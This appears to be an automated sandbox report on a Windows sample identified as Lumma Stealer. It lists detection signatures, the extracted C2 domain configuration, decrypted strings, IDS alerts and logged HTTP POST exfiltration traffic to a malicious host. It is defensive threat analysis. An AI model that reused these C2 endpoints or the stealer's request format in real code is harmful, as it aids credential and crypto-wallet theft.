
Windows Analysis Report
filename.exe

Overview

General Information

Sample name: filename.exe
Analysis ID: 1587439
MD5: b826127052f19e148f3a0cbe6f33b59c
SHA1: 9a584be1e8949c627377bccbcb47bbd98f377d92
SHA256: 3741c4663479ad4cbc2159dc4c66ff0fef9290ba58da07c33eb4b87b54cdc81d
Tags: exe, user-zhuzhu0009
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to resolve many domain names, but no domain seems valid
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • filename.exe (PID: 7512 cmdline: "C:\Users\user\Desktop\filename.exe" MD5: B826127052F19E148F3A0CBE6F33B59C)
    • WerFault.exe (PID: 7736 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7512 -s 1856 MD5: F5210A4A7E411A1BAD3844586A74B574)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["bashfulacid.lat", "enterwahsh.biz", "manyrestro.lat", "slipperyloo.lat", "talkynicer.lat", "shapestickyr.lat", "curverpluch.lat", "tentabatte.lat", "wordyfindy.lat"], "Build id": "HpOoIh--2a727a032c4d"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.1434347762.000000000097B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1446925420.000000000097B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.1532069127.00000000008DA000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x1188:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.1433413919.000000000097B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
            No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T11:36:10.352691+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.3 | 49745 | 104.102.49.254 | 443 | TCP
2025-01-10T11:36:11.568040+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.3 | 49754 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:12.519064+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.3 | 49762 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:14.301208+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.3 | 49773 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:15.320339+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.3 | 49779 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:16.483701+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.3 | 49788 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:17.826170+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.3 | 49799 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:18.838630+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.3 | 49805 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:19.840374+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.3 | 49811 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:12.005133+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.3 | 49754 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:12.976226+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.3 | 49762 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:20.313124+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.3 | 49811 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:12.005133+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.3 | 49754 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:12.976226+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.3 | 49762 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:09.669950+0100 | 2058480 | 1 | Domain Observed Used for C2 Detected | 192.168.2.3 | 50835 | 1.1.1.1 | 53 | UDP
2025-01-10T11:36:09.644088+0100 | 2058484 | 1 | Domain Observed Used for C2 Detected | 192.168.2.3 | 62975 | 1.1.1.1 | 53 | UDP
2025-01-10T11:36:09.495762+0100 | 2058608 | 1 | Domain Observed Used for C2 Detected | 192.168.2.3 | 56184 | 1.1.1.1 | 53 | UDP
2025-01-10T11:36:09.605984+0100 | 2058492 | 1 | Domain Observed Used for C2 Detected | 192.168.2.3 | 60721 | 1.1.1.1 | 53 | UDP
2025-01-10T11:36:09.620029+0100 | 2058500 | 1 | Domain Observed Used for C2 Detected | 192.168.2.3 | 50960 | 1.1.1.1 | 53 | UDP
2025-01-10T11:36:09.594358+0100 | 2058502 | 1 | Domain Observed Used for C2 Detected | 192.168.2.3 | 56386 | 1.1.1.1 | 53 | UDP
2025-01-10T11:36:09.630241+0100 | 2058510 | 1 | Domain Observed Used for C2 Detected | 192.168.2.3 | 63788 | 1.1.1.1 | 53 | UDP
2025-01-10T11:36:09.658299+0100 | 2058512 | 1 | Domain Observed Used for C2 Detected | 192.168.2.3 | 57859 | 1.1.1.1 | 53 | UDP
2025-01-10T11:36:09.581828+0100 | 2058514 | 1 | Domain Observed Used for C2 Detected | 192.168.2.3 | 50072 | 1.1.1.1 | 53 | UDP
2025-01-10T11:36:14.719353+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.3 | 49773 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:10.823273+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.3 | 49745 | 104.102.49.254 | 443 | TCP


            AV Detection

Source: https://sputnik-1985.com/api%H | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/apiDX | Avira URL Cloud: Label: malware
Source: enterwahsh.biz | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/api. | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/VL | Avira URL Cloud: Label: malware
Source: https://bashfulacid.lat/pi | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/apice | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com:443/api | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/ | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/apiS | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com// | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/apif | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/apip | Avira URL Cloud: Label: malware
Source: https://bashfulacid.lat/pic1 | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/apil | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/2L | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/apixO | Avira URL Cloud: Label: malware
Source: 0.2.filename.exe.400000.0.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["bashfulacid.lat", "enterwahsh.biz", "manyrestro.lat", "slipperyloo.lat", "talkynicer.lat", "shapestickyr.lat", "curverpluch.lat", "tentabatte.lat", "wordyfindy.lat"], "Build id": "HpOoIh--2a727a032c4d"}
Source: filename.exe | Virustotal: Detection: 52%
Source: filename.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.7% probability
Source: filename.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp | String decryptor: bashfulacid.lat
Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp | String decryptor: tentabatte.lat
Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp | String decryptor: curverpluch.lat
Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp | String decryptor: talkynicer.lat
Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp | String decryptor: shapestickyr.lat
Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp | String decryptor: manyrestro.lat
Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp | String decryptor: slipperyloo.lat
Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp | String decryptor: wordyfindy.lat
Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp | String decryptor: enterwahsh.biz
Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp | String decryptor: HpOoIh--2a727a032c4d
Source: C:\Users\user\Desktop\filename.exe | Code function: 0_2_004198CA CryptUnprotectData, 0_2_004198CA

            Compliance

Source: C:\Users\user\Desktop\filename.exe | Unpacked PE file: 0.2.filename.exe.400000.0.unpack
Source: filename.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49754 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49762 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49773 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49779 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49788 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49799 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49805 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49811 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2058500 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) : 192.168.2.3:50960 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058492 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) : 192.168.2.3:60721 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) : 192.168.2.3:50072 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058484 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) : 192.168.2.3:62975 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) : 192.168.2.3:56386 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) : 192.168.2.3:63788 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058608 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enterwahsh .biz) : 192.168.2.3:56184 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058480 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) : 192.168.2.3:50835 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) : 192.168.2.3:57859 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.3:49745 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.3:49762 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.3:49762 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.3:49773 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.3:49754 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.3:49754 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.3:49811 -> 104.21.48.1:443
Source: Malware configuration extractor | URLs: bashfulacid.lat
Source: Malware configuration extractor | URLs: enterwahsh.biz
Source: Malware configuration extractor | URLs: manyrestro.lat
Source: Malware configuration extractor | URLs: slipperyloo.lat
Source: Malware configuration extractor | URLs: talkynicer.lat
Source: Malware configuration extractor | URLs: shapestickyr.lat
Source: Malware configuration extractor | URLs: curverpluch.lat
Source: Malware configuration extractor | URLs: tentabatte.lat
Source: Malware configuration extractor | URLs: wordyfindy.lat
Source: unknown | DNS traffic detected: query: curverpluch.lat, replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: manyrestro.lat, replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: enterwahsh.biz, replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: talkynicer.lat, replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: 198.187.3.20.in-addr.arpa, replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: slipperyloo.lat, replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: 50.23.12.20.in-addr.arpa, replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: tentabatte.lat, replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: shapestickyr.lat, replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: bashfulacid.lat, replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: wordyfindy.lat, replaycode: Name error (3)
Source: global traffic | TCP traffic: 192.168.2.3:57705 -> 162.159.36.2:53
Source: Joe Sandbox View | IP Address: 104.21.48.1
Source: Joe Sandbox View | IP Address: 104.102.49.254
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49762 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49788 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49773 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49745 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49799 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49779 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49805 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49811 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49754 -> 104.21.48.1:443
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 86 | Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=HDIY54FQBZE5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12833 | Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=9PRQ9RE77OAYR9AA | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12105 | Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=QYFZCQ13SE3ZZXLYU | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20457 | Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=U797ZPLIWVP6J6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1213 | Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=1NNI7LSH | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1052 | Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 121 | Host: sputnik-1985.com
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 (4 occurrences)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (13 occurrences)
Source: global traffic | DNS traffic detected: DNS query: enterwahsh.biz
Source: global traffic | DNS traffic detected: DNS query: wordyfindy.lat
Source: global traffic | DNS traffic detected: DNS query: slipperyloo.lat
Source: global traffic | DNS traffic detected: DNS query: manyrestro.lat
Source: global traffic | DNS traffic detected: DNS query: shapestickyr.lat
Source: global traffic | DNS traffic detected: DNS query: talkynicer.lat
Source: global traffic | DNS traffic detected: DNS query: curverpluch.lat
Source: global traffic | DNS traffic detected: DNS query: tentabatte.lat
Source: global traffic | DNS traffic detected: DNS query: bashfulacid.lat
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: sputnik-1985.com
Source: global traffic | DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: global traffic | DNS traffic detected: DNS query: 50.23.12.20.in-addr.arpa
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: sputnik-1985.com
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
            Source: filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
            Source: filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
            Source: filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
            Source: filename.exe, 00000000.00000003.1435043330.00000000034F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: filename.exe, 00000000.00000003.1435043330.00000000034F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: filename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: filename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: filename.exe, 00000000.00000003.1435043330.00000000034F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.X-0EdX_w3eQf
            Source: filename.exe, 00000000.00000003.1435043330.00000000034F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sfVXAKwWPXPT
            Source: filename.exe, 00000000.00000003.1435043330.00000000034F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: filename.exe, 00000000.00000003.1435043330.00000000034F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: filename.exe, 00000000.00000003.1435043330.00000000034F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49754 version: TLS 1.2
